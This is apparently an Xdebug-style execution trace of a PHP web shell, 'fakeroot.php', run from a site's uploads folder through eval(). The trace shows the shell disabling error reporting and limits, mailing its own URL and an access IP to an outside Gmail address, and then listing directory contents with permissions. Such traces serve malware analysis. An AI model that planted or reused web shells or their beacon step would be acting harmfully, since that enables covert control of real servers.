3	23	0	0.008381	621992	explode	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	105	2	'/'	'/var/www/html/uploads'
3	23	1	0.008402	622568
3	23	R			[0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	105	$paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	107	$id = 0
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	109	$a = TRUE
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	107	$id = 1
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i = 0
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	107	$id = 2
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i = 0
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	107	$id = 3
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i = 0
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	107	$id = 4
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i = 0
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	115	$i++
3	24	0	0.008773	622496	error_reporting	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	481	1	0
3	24	1	0.008793	622536
3	24	R			0
3	25	0	0.008811	622496	set_time_limit	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	482	1	0
3	25	1	0.008831	622528
3	25	R			FALSE
3	26	0	0.008849	622496	ini_set	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	483	2	'memory_limit'	'-1'
3	26	1	0.008877	622600
3	26	R			'128M'
3	27	0	0.008898	622496	ini_set	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	637	2	'output_buffering'	0
3	27	1	0.008913	622568
3	27	R			FALSE
3	28	0	0.008927	622496	ini_set	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	638	2	'display_errors'	0
3	28	1	0.008941	622568
3	28	R			''
3	29	0	0.008954	622496	set_time_limit	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	639	1	0
3	29	1	0.008968	622528
3	29	R			FALSE
3	30	0	0.008980	622496	ini_set	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	640	2	'memory_limit'	'64M'
3	30	1	0.008994	622600
3	30	R			'-1'
3	31	0	0.009008	622496	header	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	641	1	'Content-Type: text/html; charset=UTF-8'
3	31	1	0.009025	622672
3	31	R			NULL
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	642	$tujuanmail = 'fikriofficial4676@gmail.com'
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	643	$x_path = 'http://localhost/uploads/fakeroot.php'
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	644	$pesan_alert = 'fix http://localhost/uploads/fakeroot.php :p *IP Address : [ 127.0.0.1 ]'
3	32	0	0.009081	622856	mail	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	645	4	'fikriofficial4676@gmail.com'	'ACCESS'	'fix http://localhost/uploads/fakeroot.php :p *IP Address : [ 127.0.0.1 ]'	'[ 127.0.0.1 ]'
3	32	1	0.009803	623000
3	32	R			FALSE
3	33	0	0.009828	622816	scandir	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	715	1	'/var/www/html/uploads'
3	33	1	0.009866	623440
3	33	R			[0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'fakeroot.php', 5 => 'prepend.php']
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	715	$scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'fakeroot.php', 5 => 'prepend.php']
3	34	0	0.009909	623456	is_dir	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	726	1	'/var/www/html/uploads/.'
3	34	1	0.009928	623520
3	34	R			TRUE
3	35	0	0.009942	623488	is_dir	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	726	1	'/var/www/html/uploads/..'
3	35	1	0.009958	623536
3	35	R			TRUE
3	36	0	0.009972	623496	is_dir	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	726	1	'/var/www/html/uploads/.htaccess'
3	36	1	0.009988	623536
3	36	R			FALSE
3	37	0	0.010001	623496	is_dir	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	726	1	'/var/www/html/uploads/data'
3	37	1	0.010016	623536
3	37	R			TRUE
3	38	0	0.010030	623496	is_writable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	731	1	'/var/www/html/uploads/data'
3	38	1	0.010048	623536
3	38	R			TRUE
3	39	0	0.010073	623464	perms	1		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	733	1	'/var/www/html/uploads/data'
4	40	0	0.010088	623464	fileperms	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	795	1	'/var/www/html/uploads/data'
4	40	1	0.010102	623504
4	40	R			16895
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	795	$perms = 16895
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	811	$info = 'd'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	824	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	825	$info .= 'w'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	828	$info .= 'x'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	831	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	832	$info .= 'w'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	835	$info .= 'x'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	838	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	839	$info .= 'w'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	842	$info .= 'x'
3	39	1	0.010233	623504
3	39	R			'drwxrwxrwx'
3	41	0	0.010248	623464	is_writable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	734	1	'/var/www/html/uploads/data'
3	41	1	0.010264	623504
3	41	R			TRUE
3	42	0	0.010278	623472	is_dir	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	726	1	'/var/www/html/uploads/fakeroot.php'
3	42	1	0.010295	623520
3	42	R			FALSE
3	43	0	0.010308	623480	is_dir	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	726	1	'/var/www/html/uploads/prepend.php'
3	43	1	0.010324	623520
3	43	R			FALSE
3	44	0	0.010338	623464	is_file	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	754	1	'/var/www/html/uploads/.'
3	44	1	0.010353	623488
3	44	R			FALSE
3	45	0	0.010366	623456	is_file	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	754	1	'/var/www/html/uploads/..'
3	45	1	0.010381	623504
3	45	R			FALSE
3	46	0	0.010393	623464	is_file	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	754	1	'/var/www/html/uploads/.htaccess'
3	46	1	0.010408	623504
3	46	R			TRUE
3	47	0	0.010422	623464	filesize	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	755	1	'/var/www/html/uploads/.htaccess'
3	47	1	0.010435	623504
3	47	R			64
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	755	$size = 0.0625
3	48	0	0.010460	623408	round	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	756	2	0.0625	3
3	48	1	0.010475	623480
3	48	R			0.063
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	756	$size = 0.063
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	760	$size = '0.063 KB'
3	49	0	0.010513	623504	is_writable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	767	1	'/var/www/html/uploads/.htaccess'
3	49	1	0.010530	623544
3	49	R			FALSE
3	50	0	0.010542	623504	is_readable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	768	1	'/var/www/html/uploads/.htaccess'
3	50	1	0.010559	623544
3	50	R			TRUE
3	51	0	0.010571	623504	perms	1		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	769	1	'/var/www/html/uploads/.htaccess'
4	52	0	0.010585	623504	fileperms	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	795	1	'/var/www/html/uploads/.htaccess'
4	52	1	0.010598	623544
4	52	R			33188
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	795	$perms = 33188
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	805	$info = '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	824	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	825	$info .= 'w'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	828	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	831	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	832	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	835	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	838	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	839	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	842	$info .= '-'
3	51	1	0.010731	623544
3	51	R			'-rw-r--r--'
3	53	0	0.010746	623504	is_writable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	770	1	'/var/www/html/uploads/.htaccess'
3	53	1	0.010762	623544
3	53	R			FALSE
3	54	0	0.010775	623504	is_readable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	770	1	'/var/www/html/uploads/.htaccess'
3	54	1	0.010790	623544
3	54	R			TRUE
3	55	0	0.010805	623504	is_file	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	754	1	'/var/www/html/uploads/data'
3	55	1	0.010821	623544
3	55	R			FALSE
3	56	0	0.010834	623512	is_file	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	754	1	'/var/www/html/uploads/fakeroot.php'
3	56	1	0.010849	623560
3	56	R			TRUE
3	57	0	0.010862	623520	filesize	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	755	1	'/var/www/html/uploads/fakeroot.php'
3	57	1	0.010875	623560
3	57	R			23615
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	755	$size = 23.0615234375
3	58	0	0.010899	623416	round	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	756	2	23.0615234375	3
3	58	1	0.010914	623488
3	58	R			23.062
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	756	$size = 23.062
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	760	$size = '23.062 KB'
3	59	0	0.010952	623520	is_writable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	767	1	'/var/www/html/uploads/fakeroot.php'
3	59	1	0.010969	623560
3	59	R			FALSE
3	60	0	0.010981	623520	is_readable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	768	1	'/var/www/html/uploads/fakeroot.php'
3	60	1	0.010997	623560
3	60	R			TRUE
3	61	0	0.011010	623520	perms	1		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	769	1	'/var/www/html/uploads/fakeroot.php'
4	62	0	0.011023	623520	fileperms	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	795	1	'/var/www/html/uploads/fakeroot.php'
4	62	1	0.011037	623560
4	62	R			33204
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	795	$perms = 33204
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	805	$info = '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	824	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	825	$info .= 'w'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	828	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	831	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	832	$info .= 'w'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	835	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	838	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	839	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	842	$info .= '-'
3	61	1	0.011165	623560
3	61	R			'-rw-rw-r--'
3	63	0	0.011179	623520	is_writable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	770	1	'/var/www/html/uploads/fakeroot.php'
3	63	1	0.011195	623560
3	63	R			FALSE
3	64	0	0.011208	623520	is_readable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	770	1	'/var/www/html/uploads/fakeroot.php'
3	64	1	0.011223	623560
3	64	R			TRUE
3	65	0	0.011380	623520	is_file	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	754	1	'/var/www/html/uploads/prepend.php'
3	65	1	0.011399	623560
3	65	R			TRUE
3	66	0	0.011412	623520	filesize	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	755	1	'/var/www/html/uploads/prepend.php'
3	66	1	0.011427	623560
3	66	R			57
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	755	$size = 0.0556640625
3	67	0	0.011452	623416	round	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	756	2	0.0556640625	3
3	67	1	0.011466	623488
3	67	R			0.056
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	756	$size = 0.056
2		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	760	$size = '0.056 KB'
3	68	0	0.011504	623520	is_writable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	767	1	'/var/www/html/uploads/prepend.php'
3	68	1	0.011524	623560
3	68	R			FALSE
3	69	0	0.011538	623520	is_readable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	768	1	'/var/www/html/uploads/prepend.php'
3	69	1	0.011553	623560
3	69	R			TRUE
3	70	0	0.011567	623520	perms	1		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	769	1	'/var/www/html/uploads/prepend.php'
4	71	0	0.011581	623520	fileperms	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	795	1	'/var/www/html/uploads/prepend.php'
4	71	1	0.011596	623560
4	71	R			33261
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	795	$perms = 33261
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	805	$info = '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	824	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	825	$info .= 'w'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	828	$info .= 'x'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	831	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	832	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	835	$info .= 'x'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	838	$info .= 'r'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	839	$info .= '-'
3		A						/var/www/html/uploads/fakeroot.php(7) : eval()'d code	842	$info .= 'x'
3	70	1	0.011725	623560
3	70	R			'-rwxr-xr-x'
3	72	0	0.011739	623520	is_writable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	770	1	'/var/www/html/uploads/prepend.php'
3	72	1	0.011755	623560
3	72	R			FALSE
3	73	0	0.011768	623520	is_readable	0		/var/www/html/uploads/fakeroot.php(7) : eval()'d code	770	1	'/var/www/html/uploads/prepend.php'
3	73	1	0.011784	623560
3	73	R			TRUE
2	17	1	0.011802	623456
			0.011852	437952
TRACE END   [2023-02-12 21:55:27.943588]

